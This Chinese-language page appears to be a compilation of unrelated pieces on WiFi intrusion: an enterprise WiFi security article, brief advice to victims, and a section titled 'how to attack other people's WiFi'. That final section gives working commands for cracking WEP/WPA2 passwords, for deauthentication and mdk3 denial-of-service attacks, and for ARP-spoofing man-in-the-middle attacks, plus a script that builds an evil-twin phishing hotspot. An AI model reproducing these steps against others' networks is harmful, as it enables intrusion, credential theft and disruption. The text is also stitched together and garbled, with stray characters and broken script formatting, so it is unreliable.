入侵无线网络

㈠ 由无线网络引发的内网入侵

Author: qingxp9

前几日,一条关于"前员工入侵富士康网络：疯狂洗白iPhone获利300万"的新闻刷爆了网络。员工通过在富士康内部秘密安装无线路由器的方式侵入了苹果公司的网络，通过为他人“改机、解锁”手机共9000余部，五个月违法所得共计300余万元。

这是一个利用企业无线网络达成入侵内网的典型案例。近年来，因无线网络导致的安全事件已经逐渐占领了新闻的头条，在某漏洞平台检索时发现仅2015年便发生了数十起知名企业因WiFi相关安全问题导致内网被入侵的事件，对企业造成了十分恶劣的影响。

我们简单回顾一下：

到了2016年，无线网络已经成为了企业移动化办公的重要基础设施。由于普遍缺乏有效的管理，无线网络也越来越多的成为黑客入侵企业内网的突破口。

回到开头提到的富士康iphone刷机解锁事件，通过新闻描述便可大致了解到整个攻击过程：

攻击者通过组合使用私接路由器和无线网桥的手法，可以将针对企业内网攻击的实施范围扩大到难以想象的几十公里，极大增强了攻击的隐秘性，这种攻击手段值得警惕。

从天巡实验室长期的测试和对无线网络安全防护的数据和经验看,WiFi密码泄漏、钓鱼WiFi、私搭乱建WiFi成为目前企业WiFi网络的三大安全隐患。

1、密码泄漏

WiFi密码泄漏主要有以下4个方面的原因：

就现阶段而言，WiFi密码被不当分享的问题，已经成为了企业WiFi网络所面临的最为首要的安全性问题。这主要是因为：考虑到成本和实施复杂度，家庭和小型企业都会选择采用WPA-PSK加密方案，特点便是所有人使用相同的密码。家用WiFi网络的使用者一般为3-5人，而企业WiFi网络往往有数十人，甚至成百上千多的人在同时使用，只要有一个人不慎将密码分享了出来，密码也就不再是秘密了。

某些第三方WiFi密码分享平台的产品逻辑也进一步加剧了企业WiFi密码被“意外分享”的节奏。比如，2015年初，媒体广泛报道了某个知名的第三方WiFi密码分享工具可能造成用户信息泄漏的新闻。报道显示，该产品在用户安装后，会默认勾选“自动分享热点”选项。使用该软件的近亿用户一旦接入任何企业的WiFi网络，都会自动的把企业的WiFi密码分享出去，而这一过程企业网管几乎完全无法控制和阻止。

2、员工私搭乱建WiFi给企业网络带来安全隐患

在WiFi技术流行以前，企业内网中的电脑都是通过有线方式进行连接的，企业网络的拓扑结构和网络边界通常也是固定的。但是，自从WiFi技术普及以来，企业的内网边界正在变得越来越模糊。特别是私搭乱建的WiFi网络，给企业的内网安全造成了极大的隐患。

一般来说，企业员工私搭乱建WiFi网络主要有以下几种形式：

私搭乱建的WiFi网络实际上是在那些已经得到准入授权的设备上开放了一个新的入口，使得那些未经授权的设备可以通过这个入口不受限制的接入内网系统，而且管理员往往很难发现。

3、钓鱼WiFi是黑客入侵企业网络的重要途径

2015年央视315晚会上，安全专家现场演示了钓鱼WiFi的工作过程。在晚会现场，观众加入主办方指定的一个WiFi网络后，用户手机上正在使用哪些软件、用户通过微信朋友圈浏览的照片等信息就都被显示在了大屏幕上。不仅如此，现场大屏幕上还展示了很多用户的电子邮箱信息

㈡ wifi被入侵，QQ等聊天记录被看见，且网络被人注入病毒，该怎么办

第一步先断网，第二步看看防火墙是否关闭了，如果关闭了需要开起，第三步进行全盘扫描杀毒

㈢ 邻居通过入侵我的wifi监视我的手机，怎么办

方法很简单：

1、修改WIFI名称，关闭WIFI的SSID广播。然后再修改连接WIFI的连接密码。

2、手机可以通过手动添加WiFi网络连接WiFi。方法：打开WLAN，添加其他网络。输入网络SSID（WiFi名），选择无线路由器的WiFi安全模式，输入WiFi密码即可。

3、手机直接用移动流量上网，关掉家里的WIFI，这样对方就不能入侵你的WIFI了。

㈣ 入侵无线网络问题

想要破解对方密码，首先，你的网卡要支持BT3。
很遗憾，你的网卡不支持。。所以别想破解了。。
可以参考下http://www.anywlan.com/bbs/archiver/tid-13709.html

受限制，1是你IP没设置对，2是对方路由没承认你的物理地址。

㈤ 怎么攻击别人wifi

1.保密性
我们攻击WIFI的第一个思路就是从保密性出发，我们希望从无线系统中获取用户的明文数据。首先，我们知道WIFI的的认证加密主要有以下四种方式：OPEN（无加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。
OPEN的WIFI没有采取认证加密措施，任意用户均可链接WIFI，用户数据在BSS（基本服务集）中明文传输，恶意用户没有任何门槛就可连接，然后通过中间人攻击即可获取用户的数据（SSL、SSH等需要其他工具）。如下图所示：
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码，然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。
WEP大概如下：
airomp-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下：
airomp-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据，抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包，更快的获取handshake
aircrack-ng -w 你的字典文件备老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP，通过中间人的方式获取用户仿和明文数据，或者直接用wireshark抓取加密包，然后通过airdecap-ng工具解密，然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功，取决于你字典是否强大，此时我们可以想办法诱骗用户主动输入WIFI密码，比如我们创建一个和目标AP具有同样ESSID的软AP，用户可以连接上，单在浏览网页时会弹出一个虚假的认证页面，告诉用户必须输入WIFI的密码，用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码，但此密码并没有去验证，如果用户输入错误，也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验，成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性，通常通过DOS攻击来实现，比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包，迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接，从而耗尽AP的资源造成DOS攻击
3.真实性
（1）恶意用户进入无线系统后，可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗，ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页含桐时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情，比如获取cookie，嵌入js，结合beef进一步攻击等等。。。
（2）伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器（必须先安装isc-dhcp-server），开启路由，开启系统转发，开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点，并可以上网，但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据，在WIFI攻击这块貌似用处不大。
5.不可抵赖性